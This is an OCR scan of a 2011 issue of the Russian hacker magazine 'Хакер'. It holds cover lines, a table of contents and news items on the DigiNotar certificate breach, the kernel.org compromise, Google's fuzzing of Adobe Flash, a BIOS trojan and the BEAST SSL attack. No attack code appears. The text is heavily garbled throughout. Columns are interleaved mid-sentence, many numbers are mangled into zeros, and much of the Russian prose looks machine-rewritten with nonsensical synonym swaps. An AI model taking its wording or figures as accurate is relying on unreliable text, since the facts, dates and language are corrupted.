Page 0

ВЗЛОМ

SSL:

В ТЕОРИИ относительно И НА ПРАКТИКЕ е ЖУРНАЛ

ОТ

КОМПЬЮТЕРНЫХ ХУЛИГАНОВ

FIH 11 [154] 0011

STEVEN PAULJOBS (1955-2011) РЕКОМЕНДОВАННАЯ

ЦЕНА:210р.

- e WINoowss:

---

РАЗБИРАЕМСЯ , ЧТО К ЧЕМУ

ВЗЛАМЫВАЕМ НАSР-КЛЮЧИ

- относительно

-

СОЗДАЕМ СПАМ-БЛОГ И ЗАРАБАТЫВАЕМ НА НЕМ

(game]land hi-tun medla

БЭКДОРВБД ПРОТРОЯНИВАНИЕ

MYSQL С

ПОМОЩЬЮ

ХРАНИМЫХ ФУНКЦИЙ, ПРОЦЕДУР И ТРИГГЕРОВ

О ТОМ, КАК СТАНДАРТНЫМИ ВОЗМОЖНОСТЯМИ СУБД ОСТАВИТЬНЕЗАМЕТНУЮ

ЛАЗЕЙКУ В СИСТЕМЕ.


Content

004

016

MEGANEWS Всеновоезапоследн ийм есяц

084

FERRUM

088

С приставкой Supeг Сравнительноетестирование мониторов

для базе IРS/МVА-матриц

020

Линейка : Обзор

022

-

Buffalo NAS через яnонской

комnании

Buffalo

Шестое чувство Обзор вибронакидки Gametгix Тгuе

live sense

036

040

SuЫime Text 0, другими словами кунг- фуй адрес да н г

DгорЬох: nуть с идеи перед

006

SSH

Proof-of-Coпcept

HTML5

Снифер + МIТМ-атаки

=Ox4553-lnteгcep t eг

Правильные МIТМ-атаки nод Windows

PHREAKING Монитор для каждой железке! Д елаем VGА- на ыхо д бери

FPGA

Easy-Hack

AntiHASP

010

DLL-хардкодинг

-

Внедряем свою

UNIXOID Победаввойнезаресурсы

019

Зализываем раны

Обзорэксплоитов

Ограничиваем Linuх- n риложения во ресурсах системы По д роб н ое

how to касательно том,

Бэкдорв БД

SYN/ACK Форт Нокс на твоей компании Создаем расnределенное помещение

GlusterFS

На страже персональныхданных Законно защищаем nереанальные данные,

MySQ L от

nомощью хранимых функций,

безвыгодный nокуnая кота во мешке

034

Энигмадлясисадмина

Ш ифруем элек т ронную n очту разными сnособами

068

lframe: з ащита равно удар

038

072

BEAST: смертный похищение SSL - кукисов

-

FAQ UNIТED Большой FAQ

Первая работающая наскок получай SSL/TLS-npoтoкoл

041

Диско

076

X-Tools

Сплоги получи WoгdPress с Ад об Я Как построить особенный nервый сnам-блог равно держи нем заработат ь

hacker tweets Хак-сцена на тви тт ере На нежели зарабатывают воротилы бизнеса загрузок

Программы ради взлома

078

аюшки? годится д елат ь

вмиг nосле вз л ома аппаратура

данных из nомощью

029

HAS P

DLL на чужую nрограмму

014

024

nро ц едур да три г геров

067

n ользователей

Кодинг глазами эзотериков

Эмулируем клавиша аnnаратной защиты

Колонка редактора

Протроянивание

062

05 миллионов

инечеловеческой логики

Анализ свеженькихуязвимастей

056

СЦЕНА

Обозрение Тьюринговской трясины

Хакерекие секреты nростых вещей

050

равно что такое? из ними делать?

Человек ломает SAP

002

взлом 046

Вирусы для того гуглофонов: наравне они создаются

КОДИНГ

WWW2

VNС-клиент нате

Panda, Comodo: nросто,

Microsoft

Про двухфакторную авторизацию с целью

035

ClamдV,

Больные роботы

098

Windows 0: аюшки? нового?

Правильный вычитчик ко д а с целью nрограммиста

034

AVG, Avast,

Коробка на облаках

Удобные wеЬ-сервисы

030

Накорячиваем

результативно равным образом минуя извращений

Интервью не без; Александром <<sh2keгг>> Поляковым

Первый зырк для будущую систему

029

Ассемблером сообразно эвристике

092

PCZONE 023

MALWARE

XSS: кросс-сайтим нате полную! Полный проводник по мнению ХSS-уязвимостям

юниты

0.5

044

Г б всякой всячины

Цифры

Dropbox:

интересные документация касательно nоnулярном се р висе


MEGANEWS

WINDOWSS DEVELOPER PREVIEW вышла на свет, равным образом всего только из-за первые

02 часов потом релиза новую ОС скачалиболее 000 000 раз.

ЕЩЕ ОДИН СКАНДАЛ

НЕЙРОСИНАПТИЧЕСКИЕ

С СЕРТИФИКАТАМИ

ПРОЦЕССОРЫ ОТ

ГОЛЛАНДСКИЙ ПОСТАВЩИК СЕРТИФИКАТОВ DIGINOTAR

РАЗРАБОТКА ЧИПОВ БУДУЩЕГО

СМАЧНОСЕЛ В ЛУЖУ

УЖЕ ИДЕТ ПОЛНЫМ ХОДОМ

IBM

а

_____ -_. . ____ ------------· ...

..... _...

...., _ .,..,_,__ ,._"

Для nравительства Н равным образом дерландов не· приятностьситуа­

ции заклю чаетс пишущий эти строки да

на том, зачем

DigiNota r

предварительно недавних пор

была одно й из четы ре х для омпаний , встроенны х в правительственную

РКI-инфраструктуру

PКiove rheid. Теnерь безопасность государственных

сайтов может быть nод угрозой .

бсолютно несостоятельным во сфере информационной безоnасности оказался голландский nоставщик сертификатов DigiNotar. В неко т ором смысле n овторилась регесты со взломом сервера комnа­

равно

селедавателье кое nодразделение корnорации IBM в сотрудничестве из рядомуниверситетов nредставило новоеnоколениезксnериментальныхкомnьютер­

ных чиnов, созданныхдля эмуляции работы головного мозга

нии Comodo. Атака, наnравленная н а DigiNotar, была осуществлена единаче во

человекавnроцессевосnриятия,действияиnознанияновой

июле, да и то на центре сертификации nоnытались замаскировать зтотфакт, вначале

информации. Пока этолишь nрототиnы, однако, еще рабочие.

отрицая nроблему, а nотом заявляя, что-то совершенно мошеннические сертификаты за­

Новые чиnы никак не со держат на себя каких-либо биологических

блокированы . П озже выяснилось, который был сгенерирован 031 чужой SSL

элементов, одначе обладаютих свойс твами. Внутри чиnов

да EVSS L сертификат, во так момент как бы изначально совместно сохатый насчёт создании 047

естьтакназываемоенейросинаnтическоеядр~созданное

фей ков. Злоумышленники генерировали сертификаты во школа трех дней.

изкремниевыхструктуриинтегрированнойnамяти,вос­

Подделки были созданы что про круnных комnаний, таких во вкусе Yahoo!, Google,

nрои зводящей мозговые синаnсы вычислительного блока,

Mozilla, Microso f t !включая сертификаты для того службы Windows Updatel, Skype, Facebook равно Tw i tteг, где-то равно ради доменов сnецслужб, н аnример, интересах сайтов ЦР У lc ia.gov l, MИ-6I sis.gov.uk l да Моесад l mossad.gov.il l . Сnисок nолучен благо­

имитирующего нейроны, да коммуникационной области, вос­

даря содействию nравительства Нидерландов , которое инициировало

nроизводящей мозговые аксоны. Чиnов nока двоечка , да тот и другой имеют ядра, созданные нате базе 05-нанометровой технологии

001-

зе ро в, ра зумеется, исключили DigiNotaг с сnиска доверенных создателей

CMOS да содержащие соответственно 056 нейронов. Одно сердцевина со держит в себе в соответствии с 062144 nрограммируемыхсинаnса, другое-65536 обучающихся си получай nса. В IBM говорят, зачем чиnы на nр оведенных

сертификатов, а Голландские руководящие круги намерены засу дить DigiNotaг, чай в

демонстрацияхnоказалисвоюусnешностьвтакихзадача~

nроведение аудита удостоверяющего центра DigiNotar. Разработчики брау­

серверах центра сертификации никак не обновлялось ПО , да наnрочь отсутствовало

наравне навигация, машинное видение, ассоциативная nамять равным образом

антивирусное ПО. Пока nравительство страны пока взяло однако оnерации,

другие. В будущем получай базе созданных nроцес саро на nланируют

nроводимые D igi N otaг, возьми себя.

создаватьтак называемые << nознающие комnьютеры>>.

-

MyS~ БОЛЕЕ 050 МЛН. СКАЧИВАНИЙ

:::.

-

SAMSUNG НАМЕРЕНА ОТКРЫТЬ ИСХОДНЫЙ КОД

ВЗЛОМАН САЙТ MYSQL.COM.

В ELCOMSOFТ НАУЧИЛИСЬ

набрала игрушка Angгy Biгds

Хакеры nопали из ь безо

ВЗЛАМЫВАТЬ ПАРОЛИ

ВЫШЕЛ PARALLELS DESKTOP7 ДЛЯ МАС.

с комnанииRоviо MoЬile.

своейсобственноймобиль-

выдумки : они nросто повторение

BLACKBERRY, исnользуя

Новинка может прихвастнуть

Ежедневно человеки проводят

нойоперационнойсистемы

направлялиnосетителей

данные, хранящиеся возьми

больше нежели

вслед игрой во << Птичек» nо ряд-

bada. После сего использо-

налевыйсайтиnытались

карте nамяти . 0-символьный

МОЖНОСТЯМИ, улучшеННОЙ

ка

вать ОС смогут равно оставшиеся тратить

их nротроянить от nомощью

nараль восстанавливается

nроизводительностью да

изводители смартфонов .

сnлоитпака

после считанные тикалы .

многим другим.

000 млн.

минут.

Blackhole.

00 новыми воз-

ХАКЕР

01/154/2011


MEGANEWS

СУТКИ НЕСЛОЖНОЙ DDOS-ATAKИ СТОЯТ ДОВОЛЬНО ДЕШЕВО: примерно$50 .

ЛОМАЮТ

«ЖЕЛЕЗНЫЕ»

ДАЖЕ ЗНАМЕНИТОСТЕЙ

АНТИВИРУСЫ

ХАКЕРЫУКРАЛИ У АКТРИСЫ СКАРЛЕТТ ЙОХАНСОН ФОТО В СТИЛЕ НЮ

НЕМНОГО РАЗМЫШЛЕНИЙ О ЗАЩИТЕ БУДУЩЕГО

н

едав н относительно комnани~ lпtel всем скопом _::McAfee анон-_ сировалитехнологиюа nnар атноиантивируснои

защиты

DeepSAFE, котора~ будетреализована в lntel. Суд~ до всему, гр~детнека~

новых модел~х процессорав

аnnаратна~ << nр ослойка» междупроцессаром да операцион­ ной системой . Были тоже представлены новые 02 н м nр оцес­ сары lvyBгidge равным образом оnисана технологи~ защиты отnовышени~ nривилегий

SMEP. SMEP контролируетуровень nривилегий

равным образом сnо лн ~емого ко согласен , размещенного на адресном nространстве,

выделенномдл~ работы nрограммам.При активации

SMEP

аnnаратураантивируснойза щ итыразрешаетnроцессорувы­ n олн~ть nр ограммы изо э т ого nр остранства исключительно суровнем

nривилегий 0-в nротивном случае возникает исключение,

да действие nрограммы блокируетс~.Хот~данна~ аnпаратура представлена исключительно сейчас, во официальнойдокументации

lnt el сие решениеуже нашлодокументальное отражение. В новой редакции [том ЗА, май 00111 принимать nолное оnисание ра­ боты данного оборудован и~, мурлыка орого вnолне доста ведь чнодл~ сторо нни х фирм равным образом их разработок . Н е~сно nока, ~вл~етс~ ли SМ ЕРч астьютехнологии

DeepSAFE. На nрезентации об этом

неуnоминалось, равно реальность двух схожихтехнологий во что до дн ом nродукте маловеро~тно . Нелишне заметить, в чем дело? на начале годы

по~ вилась стать~ l www. q ipeгd г ive г. г u/пo d e/З I со nодробным какихтолько взломах наш брат безвыгодный nишем держи страницах][, однакотакогодаже у нас е щ е никак не было. Весьма комична~истори~nриключиласьвэтоммес~цепоту

сторонуАтлантики.Известна~голливудска~актрисаСкалетт

00

секунд Ральфа-Филипnа

своим участием, тем не менее какснимки nоnали во Интернет-было

ца Иоэзо возьми хакинг

загадкой. Дело на том, чтофотографии Скарлетт делала сама, получай

i PhoneЗGS во рамках

iPhone и, разумеете~, никуда их н е выкладывала.

русных атак , вдобавок были nредоставлены работосnособные << виртуальные >> макеты таких устройств защиты.

ушло у команды

ЙохансонвнезаnнообнаружилавСетиэротическиефотосо

частный

оnисанием возможных алгоритмов аnпарат н ой защиты ото ви­

Вейнмана равным образом Винчен­

соревнования

Pwn2own.

Шокированна~ звездатут а отход илась ни мно го ни немножко на

ФБР, со требованием разобратьс~ на nроисход~щем безобразии. Комnетентныелюди с «ор ганов» разобрались равным образом сообщили,

что-то сие действие хакера, ко т орый, коллегия ~ п касательно всему, вместе с n ециализирует­

с~ назнаменитост~х. Помимо Йохансон на сnиске nострадавших также числ~тс~ больше

00 звез д , сре ди которыхДжессикаАль­

ба, КристинаАги л е р а равно М ила Кунис. У всехдевушектоже были украдены личные данные, видеозаnиси да фотоснимки. ФБР, кстати, пугающе сообщает, чтоуже до смерти по соседству для раскры т ию

nр естуnле ни~ . А nока nравоохранительные гам ганы ищут вино­ вных, мы, конечно, безвыгодный можем nр ~татьоттеб~ прекрасное, во всяком случае

его бери страницах нашегожурнала бываеттак скудно :1.

$'0000ПОТРАТИЛОРУКОВОД­ СТВОFАСЕВО0К ради первыетри недели во рамках работы про­ граммы соответственно выплатеденежных

вознаграждений людям, которые сообщают насчёт ба г ахти на сайте социальной сети. Уже есть и близкие рекордсмены -один че­

ловек обобщенно получил

АВТОР JAILBREAKME.COM,

00ЛЕТИСПОЛНИЛОСЬ

выявив

знаменитый «яблочный

LINUX. B 0991

В общей сложности вознаграж­

взломщик-Николас

ЛинусТорвальдсобъявил

дениеуже успели выудить

исследователииз16различных

«Comex» Аллегра-теперь будет делать во Apple. Нач­

тотипановойоперационной

стран .

несть дьявол не без; должности стажера.

системы Liпux.

006

$7 000, 6 разныхуязвимостей.

году21-летний

осозданиирабочегопро­

ХАКЕР

01 / 054/2011


MEGANEWS

01 ИГРУ СДЕЛАЛА КОМАНДА РАЗРАБОТЧИКОВ

вплоть до того, что разработалаАngгуВiгds .

ПЛАНШЕТ AMAZON KINDLEFIRE-OГOHb! УСПЕХИ ЧИТАЛКИ KINDLE ВДОХНОВЛЯЮТ КРУПНЕЙШИЙ СЕТЕВОЙ МАГАЗИН НАДАЛЬНЕЙШИЕ СВЕРШЕНИЯ

для

а киетолько слухи невыгодный циркулировали на Сети условно грядущего релиза планшет н ика с килоом п ании Amazoп. Тем отнюдь не менее, предварительно самой презентации об нем отнюдь не было бесспорно без мала шиш конкретно­

го, а презентация показала, который умереть и никак не встать м нагом ошибались аж такие именитые издания, на правах

TechCrunch. Итак, складка склифосовский рабо т ать п од уп раелен равно ем

Aпdгoid, всё же программа до смерти строго модифицирована умельцами

Amazon. В частности, никакого тебе AпdroidMaгket -только собственный магазин приложений ото Amazon. Хорошо известно, ч т в рассуждении Amazon никак не собирается выручать для самих девайсах. Н апротив, нередко пароходство продает устройства подешевле их себестоимости, со лихвойотбивая разницу позже- на п родаже конте н та . Созда т ь универсальную подсак удобного рас п рос т ране н ия

контента - главная план Amazoп. Главным предназначением Kindle Fiгe станет использование различного мультимедийного контента: проелушивание музыки , считка книг, недогляд фильмов. Д ля каждого с сих типов конте н та у Amazon очищать кровный магазин. Устройство оснащено емкостным 0-дюймовым цветным сенсорным IРS - дисплеем из разрешением 0024 х 000 пикселей равным образом под­ держкой multi-touch. Планшет построен для двухъядерном для ц ессаре Tl ОМАР

01 ГГц l да оснащен 0 Г б встроенной nамяти. Из беспроводных возможностей предусмотрена помочь Wi-Fi 002.11 Ь/g/n. Относительно ЗG условия сле­ дующая: пока, в духе сейчас было сказано вам ш е, пример предлагается лишь во WiFi версии. Согласно информации весь т ого но издания TechCrunch, модифика­ ция из Wi F i+ЗG , может быть , появится попозже . Интересно, довольно ли доступна опция бесплат н ого ЗG по мнению всему миру? Если держи обычном Kindle серфить было, приятно

говоря, н еуд обно !все-так да методика элек т ронной бума г равным образом никак не про сего ! , то KindleFiгe готови т во этом смысле сущий прорыв. Идея заключается на том, чтобы безвыгодный вырывать пользователя использовать многочисленные отдельные элеме нт ы страниц да т ратить минута н а их ре нд ерин г нате самом д евайсе. Amazoп

тепер ь буд ет проводить в жизнь рендери н г страниц нате собст на енных серверах Е С2 и доставлять бери устройства готовые изображения. П относительно сути, Amazoп собирается

кешировать престиж ь Инт ернет равным образом д ос т а вл ять сии со т ра н равным образом цы н а Kiпdle Fi re со своих серверов . Эта технологию н азывае т ся Amazoп Silk. Н а п оследок отмечу, что помимо планшета были представле н ы новые версии обычной читалки Kiпdle.

Е е тепе рь допускается выкупить -д е р жись получай стуле - вслед за $79 ! И хотя бы Amazo п невыгодный д о­

amazon.com® "

сп

став л яе т их для п рямую на Р оссию, залежь нетрудно не запрещается возбранить вследствие сервисы­

Продажи планшета Кiпdl e Fi г e, ко оторый Джефф Без ос представил публике лично, стартуют 05 ноября те ко ущего года, а прелиминарный индент доступен у но немедленно .

посредники чаятельно www.shipito.com .

Ц е получи и распишись устройства составит всего делов $199.

НАШИ НА

03

EKOPARTY

В Буэ н ос-Айресе оборона ш ла конфере нц ия Ekoparty-caмoe главное мера чтобы латинской Америки на области ИБ . Событие изначально носило особенно гаражный натура равно

крик г а н изовалось исключ ит е ль да н а сре д ст на а энтуз да астов. Тепер ь а

на конференции ежегодноучаствуютболее 0000 человек, а именитые докладчики самочки выстраиваются на очере д ь, с намерением п ре д назначать приманка

иссле д ования получи и распишись Ekoparty. Спонсорами конференции постоянно выступаюттакие компании, как ES ET, lmmunity, CORE, Microsoft, Google, lntel равным образом TippingPoint. В этому годунакон ц еренциибылонемалоинтерес н ых д окладов,в т омчисле и через русских nарней Жени Р одионова равно Са ш равно Матросова, которые рас­ сказали касательно различных nодходах для обходу п рове р ок ц да ф ро на ой п одписи для мо д долбленка автор др а сверху 04-битных ве р сиях

Win dows да n риве л равно присутствие ме р ы

реаль н ых вредоносных насчет г рамм, использующих сии уязвимости.

Вnрочем, настоящей изюминкой конферен ц ии стал докла д об усnешной технике атак получай запись SS L не без; н азванием <<B EAS T». Об этой новой атаке т ы може ш ь п по части д роб н что касается п ро чит ать на этом во ы пуске : есть л равно за­

интересовался,тоскорееоткрывай72стра н да ц у!

008

ХАКЕР

01 / 054/ 0011


MEGANEWS

ЕЩЕ

0 023ПАТЕНТАПРИОБРЕЛАКОМПАНИЯ GOOGLEYIBM. (lатентные войны набирают обороты .

ГРОМКИЕ ВЗЛОМЫ ПРОШЛОГО МЕСЯЦА

,~~·

УЯЗВИМОСТЕЙ

ДЛЯ ТОРРЕНТОВ И

Adobe

В

LINUX ОСЕНЬ НАЧАЛАСЬ С ПРОБЛЕМ

БОЛЬШЕ400

ADOBE FLASH

ХОРОШОЗАНИМАТЬСЯ ФАЗЗИНГОМ, ЕСЛИ

r

РАБОТАЕШЬ В GOOGLE

а

овеем давеча вышло очередное корректировка

Adobe Flash 01 0.3.183.5), во котором было официально устранено 03уязвимостей, 02 изо которых имеют характеркритическихnроблемипозволяюторганизоватьвы­

'

Protectюn

@ Pnvacy

по отношению WМNII\G! 05 infectlons FO<Гd!!!

nолнение заключение nри открытии nользователем оnределенного

ГAmqth!t.иtsc.\~~-(16).wuses(I8),.М..(4), ."..(S).!:r~CDC!hes (2)WI!fed!teded.

репорт? Затем, в пути читатель, что такое? помощник Google Тейвис

Possible."-m~:

0 S)'5teal.tt~ е

..................

Systeмst.~foi!Ьe

Flаsh-контента. Зачем ты да я nриводим здесьэтотстандартный Орманди заявил, что-нибудь по сию пору сие неnравда да в чем дело? в самомделе в nоследнемобновленииnо~ихомубылоисправленоболее400

!четырехсот, сие малограмотный оnечатка) nотенциальныхуязвимостей . Давай разберемся, отколе Орманди взял такую цифру,

e s..-O w.emetcor«Ьanlass

--·

Q v.us~cn)'(Uf'letМxk

Ott/' Settngs

R:l5strrrftjyf~ttwi:J'OLic:lмr)QJ'~fr0114the

по образу нашли такое наличность ба го на да n ри нежели в этом месте заключая

Google. Для

азы есть расчет сказать, что такое? Тейвис Орманди ­

фигура до смерти известная. К nримеру, нимало недавно, на

BlackHat 0011, симпатия изобличал антивирусное решение Sophos. Тогда Орманди продемо н стрировал аудитории, почто на относительно n ерационных системах Windows Vista от кусок nа нии

равно за пределами узел борьбы со эксnлойтами загружается, nод­

ключается ко во всем работающим nроцессам, только вообще Прони для новение х а керов получи и распишись kernel.org по части не без; тав алось незамеченным для а ко минимальное значение 07 дней ! Однако ра з · работ все в порядке автор этих строк др а у на ер е н ы , ч в таком случае ата ку ющи е безвыгодный м огли во н йес ти из для рыт ы е течение ен е ния во ко од ядра.

бездействует. Также дьявол сообщил, в чем дело? большинства антиви­

русных сигнатур никак не касалась лапа человека, хоть бы

Sophos

заявляет обратное. Словом, ему безграмотный nривыкать коnаться в чужих nрограммах да ловить во них изъяны.

разунесколькимигромкимихакамиознаменовалосьначалоосени.

Теnерь вернемся кАdоЬе

Flash. Дело на том, что-нибудь Google

Сначала неизвестные злоумышленники подпортили бытие любителям

nоставляет Flаsh-плагин во составе своего браузера Chгome.

файлообмена, взломав сайты bittoггeпt.com равно utoггeпt.com . Стан­

Сообщив миру, почто комnания

Adobe кое-чего недоговаривает,

дартные программные загрузки обеих ресурсов заменили фейковы м антиви­

Орманди равно Ко были вынуждены распахнуть другие под­

русом, известным равно как Secuгity Shield . Посетители загружали малварь где бы

робности зтогодела . Оказалось, что-нибудь самочки сотрудники

ВitТоггепt-клиентов нате протяжении нескольких часов. Затем атаки обрушились

nроинформировали

в опенсорс-сообщество. Водан после другим взлому подверглись сайты kегпеl . огg ,

обнаружили из nомощью фаззинга. Размах внутреннего ауд ита,

liпuxfouп d atioп . o г g да liпux . com . В первом случае атакующим посчастливилось почерпнуть

nроведенного на Google, nоражает творческая фантазия . Так на правах

Adobe что касается сотнях д ыр,

Google

мурлыка орые самочки а их

гооt-доступ ко серверам, видоизменить системное ПО да создать пере­

недостатка во мощностях nоисковый асур малограмотный испытывает, ис­

мошенник паралей разработчиков. В частности, атаковав ш ие заменили opeпssh­

следователямнесоставилотрудаорганизоватьграндиозное

seгveг равным образом opeпssh- cl ieпts, а та для а ар га н изовал равным образом загрузку свое го скри пта сквозь

тестирование, в целях которого отобрали nорядка

систему инициализации. А пару недель после обнаружилось , зачем взломана

файлов. В движение нескольких недель их обкатывали для

равным образом инфраструктура l inuxfoundatioп . oгg равно социальной силок L i пux . com . Под­

nлeepe во кластере изо 0000

робности взлома доколь выясняются. В доступном во нынешнее промежуток времени тексте

файлы nодвергалисьоnределенным мутациям !изменениям),

уведомления сказано, зачем атаки гипотетично связаны в обществе собой. Все

образуя далеко не штатные ситуации интересах выявления об ш ибок . В итоге

серверы организации

были обнаружены сотни nотенциальныхуязвимостей, вы­

Linux

Foundatioп отсоединены через Сети по завершения

полнойпереустановки систем.

00.000 SWFFlash-

CPU. Участвующие на тестировании

званных выходом из-за мера буфера, целочисленными nере­

nолнениями, исnользованием nамяти nосле освобождения и т.n. Всего выявлено400уникальных си г натур, nриводящих ко

крахуF~sh-nлеера . ПослеnервичнойсортировкиАdоЬеони

ДЫРКИ ЕСТЬ ВЕЗДЕ, А BOTWORDPRESS ЕЩЕ И УДОБНЫЙ

были зарегистрированы по образу

006 отдельных багов . Для исnрав­

ления данных ошибок, не без; учетом дублирования nроблем, во код потребовалосьвнести ВО изменений. Так вследствие этого но об этом нигде малограмотный сообщалось? Компания

0,.7°/о ИЗ МИЛЛИОНА САМЫХ

ПОПУЛЯРНЫХ САЙТОВ В

МИРЕ РАБОТАЮТ НА ДВИЖ­ КЕ WORDPRESS, СООБЩАЕТ . НАМ WORDPRESS.ORG 01 0

Adobe до этого времени но прокомментировала ситуацию равным образом

пояснила:

настропалять СVЕ-отчеты по части данных ошибках отнюдь не стали, приблизительно как,

за ми н ию

Adobe, CVE отражает информа ц ию в рассуждении при всей честной компании

известных ошибках, на так пора какданные дыры были вы­

явлены возле особливо внутреннем тестировании

ISPLC-Adobe

Secuгe Pгoduct Lifecycle) . Adobe заводит CVE на двух случаях: при поступлении информации абуязвимости с воли равным образом около

исправленииzего-dаууязвимостей.Дляпроблем,найден­ ных на процессе разработки продукта,

CVE далеко не заводятся,

иными словами, уязвимости исправляются молча.

ХАКЕР

01 / 054/ 0011


MEGANEWS

~~ЛАБОРАТОРИЯ КАСПЕРСКОГО>> СТАЛА ПОСТАВЩИКОМ ЗАЩИТНЫХ ПРОГРАММ к отечественного Министерства обороны .

GOOGLE WALLET НАЧАЛ

ТРОЛЛЕЙ САЖАЮТ

РАБО Т У

В ТЮРЬМУ

И ОБЕЩАЕТ ОТПРАВИТЬ НА ПОМОЙКУ ПЛАСТИКОВЫЕ КАРТЫ

СЕТЕВОЕТРОЛОЛОУЖЕНЕПРОХОДИТБЕЗНАКАЗАННО от автор этих строк у нас на стране малограмотный прецедентарное право, весь

в одинаковой мере возбраняется никак не пометить приключение произошедший

только что во Брита нии .

03 сентября

британский

судопроизводство приговорил 05-летнего а н гличанина Шана Д аффи для

08 неделям тюрьмы из-за упрямый тролли н г во

И н тернете. Не

условно. И нужно заметить, что такое? получил т ролль следовать дело. На амплуа мишени интересах своих издевок Даффи избрал родственников покойной Наташи Макбрайд. Девочка

05

парение бросилась лещадь подкидыш на День Святого Валентина, позже

что-что ее братва да свои использовали ее страницу во

Т ар

to рау with Citi® the Google Prepaid Card.

Facebook с целью обмена соболезнованиями . Д аффи

MasterCaгdiA1 в рассуждении г

безграмотный знал

деву ш ку лично, а для ее конец равным образом далеко не услы ш ал с ново­ стей . Тем безграмотный менее, трол л ь безграмотный поленился завернуть во

Learn how it works ,

Facebook

равным образом черкануть для « стене» Наташи: << мы прямо-таки задремала нате

рельсах» равно << мама, после этого на аду жарковато». Родственники покойной безгласно промолчать невыгодный стали равным образом мгновенно обратились в nолицию, которая архи бегом отыскала << ш ут н ика».

Тролль Даффи оказался зрелищем примерно а н ек д отическим :

ко

омпа н ия

Google парадно запустила свой Google Wallet

небывалый стервис мобильных платежей

-мобильное приложение, из через которо-

го позволяется уплачивать покупки на магазинах около помощи

смартфона,посредствомбесконтактнойтехнологии

Nеаг

Field Commuпication INFC). С через Google Wallet

п ользователю в целях оплаты товаров равным образом услуг нужно всего лишь

п риложи т ь смартфон со

N FС-чипом

для специальному считы­

толстым, прыщавым, живущим получай выходное пособие п в отношении безработице.

В касательно сн ов е необычно г о с ерв иса ле жит

И даже если бери суде охрана пыталась доказать, в чем дело? <<бедняга »

техн ология

NFC (NearFieldCommunication), которая дает

страдает синдромом Аспергера равным образом алкоголизмом, рассуждение безграмотный

поверил да снисхождения для троллю никак не проявил. Вердикт:

кайфовый зм что касается ж да ст ьоб вымен

месяцев тюрьмы равно

данными меж ду

0 полет вне доступа

08

ко социальным сетям.

бл изк по отношению р бог поло жен­

Интересно равно то, почто судили Даффи по мнению самому обычному

ными ( нескол ько са нтиметров ) устройствами .

обвинению-за обида во отдельно грубой форме. Суд не усмотрел паршивый радиопомехи на том, что-нибудь депрессия было

вающему устройству да определить РIN-код, в дальнейшем ась? деньжонки

нанесено на интернете да анонимно.

вслед за покупку сnисываются от кредитной карты. Этутехноло­

гию многие ведущие компании рассматривают вроде более удобную альтернативу т ра д иционным банковским картам. Правда, п ока

Google Wallet р або т аеттолько

во США, идеже вос­

пользо на а ть ся им мож н об во торговых точках не без; платежными

термина л ами MasteгCaгdPay P ass, которых насчитыва­ ется близ

050 т ысяч.

Сейчас

Google Wallet поддерживает

nлатежи всего только вместе с помо щ ью д вух типов карт - кредитных

MasteгCaгd через жестянка

Citi

равно виртуальных

Google

PгepaidCaгd,

ба л анс ко т касательно р ых мож н по отношению за п ол н ить из всякий пластиковой карты. В буду щ ем пре д ста на ители

Goog le обещают до­

бавить в области д держку кapтVisa, Ameгican Expгess равно Discoveг. Еще одно ограничение: относительно г рамма во нынешний минута может работать всего сверху смартфонах

Nexus 0 0G.

Но во будущем

планируется прибавить до дд ержку для прочие смартфоны с чипом

NFC.

.. .

ИМУЩЕСТВОХАКЕРА nошло из молотка в области его

t

но соб со твенной инициа ­ тиве . Все вырученные средства относительно т nродаж и недвижимости равно авто­

мобилей , в отношении цененные во

0

млн . рублей , были nере­

012

nравлены во Royal Bank of Scotland, nострадавш равным образом й

СОРЦЫDООМЗ будут

03% ВСЕГО ВРЕМЕНИ

оnубликованы на от­

винтернетезаnадные

через хакера . Интересно,

рытом дост у nе по конца

скольжение еры nроводят на соци­

ко акую доля убытков

возраст , сообщил главноуправляющий

альных сетях равно благах,

некто таки м образо м дым

комnан ии id Softwaгe

говорится во отчете

nокры т ь?

Иван Кармак .

комnании

Nielsen.

ХАКЕР

01/154/2011


ПОЧТИ 0 МЛН. КЛЮЧЕЙ К ИГРЕ DIRT 0 СЛУЧАЙНО ~~ПОТЕРЯЛА>> шарага AMD. Базаутекла со сайта AMD4u .com .

МАЛВАРЬ ПРОЛЕЗЕТ ДАЖ Е В

BI OS

ТРОЯ Н С НЕ СОВСЕМ СТАНДАРТНЫМ ФУНКЦИОНАЛОМ НА Ш Л И ЭКСП ЕРТЫ

КИТАЙСКОГОАНТИВИРУСНОГО ВЕНДОРА Plюe11ix - A~o~ard

Auto Save Load last

bootaЬie bootaЬie

setti11g E naЬied setting Load

standard bios default ·- Descr i pt iоп

_j

Wl1e11 tl1i s

----1

enaЬied,

Ba11k descr i pt ion Save to tllis Ba11k Load from tl1 is Bank Hotkey=> 0 L _ _ Opt ions ___J

llscr ilef ined settiny Bank 02===--, Dr:scription 0 , - Options ---i 2686 068х16 Bank description 2-1- 0-6 0. 0vl166 )223 Save to t l1is Bank Load from tl1is Bank Hotkey=> 0 1·-- Description _ j L _ _ Opt ions ___j Enter:Select f..IS.:sofrevious Va lues

пытался фити-мити ­

от воей но р т ваша милость , же

Lcve 0

э т по отношению на л екл насчёт вслед внешне

iteм

it

ра з р у шительные

io

посл е дствия :

~o~ i l l

BIOS

перезаписывался,

autoмatically s д ve

равным образом ко относительно м пьют е р позднее

yotlr last bootaЬi e CMOS setti11g to 'Backllp Bank' if the setting сопение boot your systi:m successfully .

сего лишше отнюдь не

i

tt~• : llove

BIOS малограмотный

только во а . Еще во 0999 годувирусСIН пулировать BIOS

Save sett ing to Ba11k IJi tl1 Curre11t set t i 01g ·:.,т ,kfiнeil settio1y HctнJ.: "' "···-""\ г----~-IJptloнs

ма лваря во

lte11 Help Ме н"

t·~·, ~-~pt_iJ)!}

Идея внедрения

WorkstationBIOS CMOS Setllp Utility CMOS Re loaded

з агру ж ался .

шеллегким путем, переложив всё-таки основные задачи бери самоуправно

BIOS. Он вос­

пользовался результатами работы китайского исследователя, извест­ ного подником lceloгd . Работа была проделана снова на

0007 году: о ту пору при BIOS был обнаружен безыскусственный способ перепрошивки микросхемы при помощи сервис, предоставляемый самим BIOS в SMM ISystem Management Mode]. Программный кодSММ во SMRAM не виден операционной системе !если BIOS написан корректно, дорога ко

анализеутилиты WinflashдляAwaгd •

+/-/PUIPD:Value F10:Save ESC:Exit Fl:General Help F6: Fail-Safe Defaults F7: О ti•ized Defaults

этой памяти заблокирован] равным образом исполняется объективно ото нее. Назначе­ ние данного заключение смертельно разнообразно: сие эмуляция малограмотный реализованных

итайский производительантивирусов 060 сообщает, чтоэкс­

